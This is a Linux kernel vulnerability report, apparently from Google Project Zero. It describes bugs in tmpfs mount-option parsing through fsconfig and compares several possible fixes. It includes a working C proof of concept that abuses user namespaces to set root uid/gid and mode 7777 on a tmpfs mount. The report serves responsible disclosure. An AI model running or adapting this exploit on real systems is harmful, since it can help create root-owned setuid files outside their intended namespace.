The codebase-wide refactor efforts to using the latest fs mounting API (with support for fsopen/fsconfig/fsmount etc.) have introduced some bugs into mount configuration parsing in several parse_param handlers, most notably shmem_parse_one() which can be accessed from a userns. There are several cases where the following code pattern is used: ctx->value = <expression> if(ctx->value is invalid) goto fail; ctx->seen |= SHMEM_SEEN_X; break; However, this coding pattern does not work in the case where multiple fsconfig calls are made. For example, if I were to call fsconfig with the key "nr_blocks" twice, the first time with a valid value, and the second time with an invalid value, the invalid value will be persisted and used upon creation of the mount for the value of ctx->blocks, and consequently for sbinfo->max_blocks. This code pattern is used for Opt_nr_blocks, Opt_nr_inodes, Opt_uid, Opt_gid and Opt_huge. Probably the proper thing to do is to check for validity before assigning the value to the shmem_options struct in the fs_context. We also see this code pattern replicated throughout other filesystems for uid/gid resolution, including hugetlbfs, FUSE, ntfs3 and ffs. The other outstanding issue I noticed comes from the fact that fsconfig syscalls may occur in a different userns than that which called fsopen. That means that resolving the uid/gid via current_user_ns() can save a kuid that isn't mapped in the associated namespace when the filesystem is finally mounted. This means that it is possible for an unprivileged user to create files owned by any group in a tmpfs mount (since we can set the SUID bit on the tmpfs directory), or a tmpfs that is owned by any user, including the root group/user. This is probably outside the original intention of this code. The fix for this bug is not quite so simple as the others. The options that I've assessed are: - Resolve the kuid/kgid via the fs_context namespace - this does however mean that any task outside the fsopen'ing userns that tries to set the uid/gid of a tmpfs will have to know that the uid/gid will be resolved by a different namespace than that which the current task is in. It also subtly changes the behavior of this specific subsystem in a userland visible way. - Globally disallow fsconfig calls originating from outside the fs_context userns - This is a more robust solution that would prevent any similar bugs, but it may impinge on valid mount use-cases. It's the best from a security standpoint and if it's determined that it was not in the original intention to be juggling user/mount namespaces this way, it's probably the ideal solution. - Throw EINVAL if the kuid specified cannot be mapped in the mounting userns (and/or potentially in the fs_context userns) - This is probably the solution that remains most faithful to all potential use-cases, but it doesn't reduce the potential for variants in the future in other parts of the codebase and it also introduces some slight derivative logic bug risk. - Don't resolve the uid/gid specified in fsconfig at all, and resolve it during mount-time when calling an associated fill_super. This is precedented and used in other parts of the codebase, but specificity is lost in the final error case since an end-user cannot easily attribute a mount failure to an unmappable uid. I've also attached a PoC for this bug that demonstrates that an unprivileged user can create files/directories with root uid/gid's. There is no deadline for this issue as we can't see any obvious way to cross a privilege boundary with this. Thanks in advance! -- Seth Jenkins Information Security Engineer Google Project Zero sethjenkins@xxxxxxxxxx
#define _GNU_SOURCE #include <errno.h> #include <sys/wait.h> #include <sys/utsname.h> #include <sched.h> #include <string.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mount.h> #define FSCONFIG_SET_STRING 1 #define FSCONFIG_CMD_CREATE 6 //#define MS_NODEV 4 #define MOVE_MOUNT_F_EMPTY_PATH 0x00000004 /* Empty from path permitted */ int fsopen(char* fs,unsigned long flags) { return syscall(430,fs,flags); } int fsconfig(int fd, unsigned int cmd, char* key, char* value, int aux) { return syscall(431,fd,cmd,key,value,aux); } int fsmount(int fd, unsigned int flags, unsigned int mount_attrs) { return syscall(432,fd,flags,mount_attrs); } int move_mount(int from_dirfd, const char *from_pathname, int to_dirfd, const char *to_pathname, unsigned int flags) { return syscall(429,from_dirfd,from_pathname,to_dirfd,to_pathname,flags); } static int childFunc(void* arg) { mkdir("tmpfs",0777); int fd = fsopen("tmpfs",0); if(fd < 0) { printf("fsopen: %m\n"); return 1; } printf("fs fd: %d\n",fd); sleep(2); if(fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0)) { printf("fsconfig %m\n"); return 0; } int mountfd = fsmount(fd,0,MS_NODEV); if(mountfd == -1) { printf("fsmount: %m\n"); return 0; } if(move_mount(mountfd,"",AT_FDCWD,"./tmpfs",MOVE_MOUNT_F_EMPTY_PATH)) { printf("move_mount: %m\n"); return 0; } system("mount"); int final_fd = creat("./tmpfs/testfile",O_RDWR); if(final_fd == -1) { printf("open: %m\n"); exit(1); } int dir_fd = open("./tmpfs",O_RDONLY | O_DIRECTORY); if(dir_fd == -1) { printf("opendir: %m\n"); exit(1); } sleep(5); exit(0); } #define STACK_SIZE (1024 * 1024) int main() { char* stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); if (stack == MAP_FAILED) printf("mmap: %m\n"); char* stackTop = stack + STACK_SIZE; pid_t pid = clone(childFunc, stackTop, CLONE_FILES | CLONE_NEWUSER | CLONE_NEWNS, NULL); sleep(1); char uidgidfile[64]; char map[64]; sprintf(uidgidfile,"/proc/%d/uid_map",pid); int uid_map_fd = open(uidgidfile,O_WRONLY); sprintf(map,"0 %d 1",getuid()); if(write(uid_map_fd,map,strlen(map)) < 0) { printf("write uid_map: %m\n"); exit(1); } close(uid_map_fd); sprintf(uidgidfile,"/proc/%d/setgroups",pid); int setgroups_fd = open(uidgidfile,O_WRONLY); if(write(setgroups_fd,"deny",4) < 0) { printf("write setgroups: %m\n"); exit(1); } close(setgroups_fd); sprintf(uidgidfile,"/proc/%d/gid_map",pid); int gid_map_fd = open(uidgidfile,O_WRONLY); sprintf(map,"0 %d 1",getgid()); if(write(gid_map_fd,map,strlen(map)) < 0) { printf("write gid_map: %m\n"); exit(1); } close(gid_map_fd); //Please don't run this program with extra fd's int fs_fd = 3; //It's dirty but who cares. Just waiting for fsopen to happen on child side. while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"uid","0",0)); printf("fsconfig uid set: %m\n"); while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"gid","0",0)); printf("fsconfig gid set: %m\n"); while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"mode","7777",0)); printf("mode set: %m\n"); int created_file_fd = 5; struct stat statbuf; puts("waiting for created file..."); while(fstat(created_file_fd,&statbuf)); printf("init_ns owned uid: %d\n",statbuf.st_uid); printf("init_ns owned gid: %d\n",statbuf.st_gid); int tmpfs_dir_fd = 6; while(fstat(tmpfs_dir_fd,&statbuf)); printf("init_ns dir owned uid: %d\n",statbuf.st_uid); printf("init_ns dir owned gid: %d\n",statbuf.st_gid); }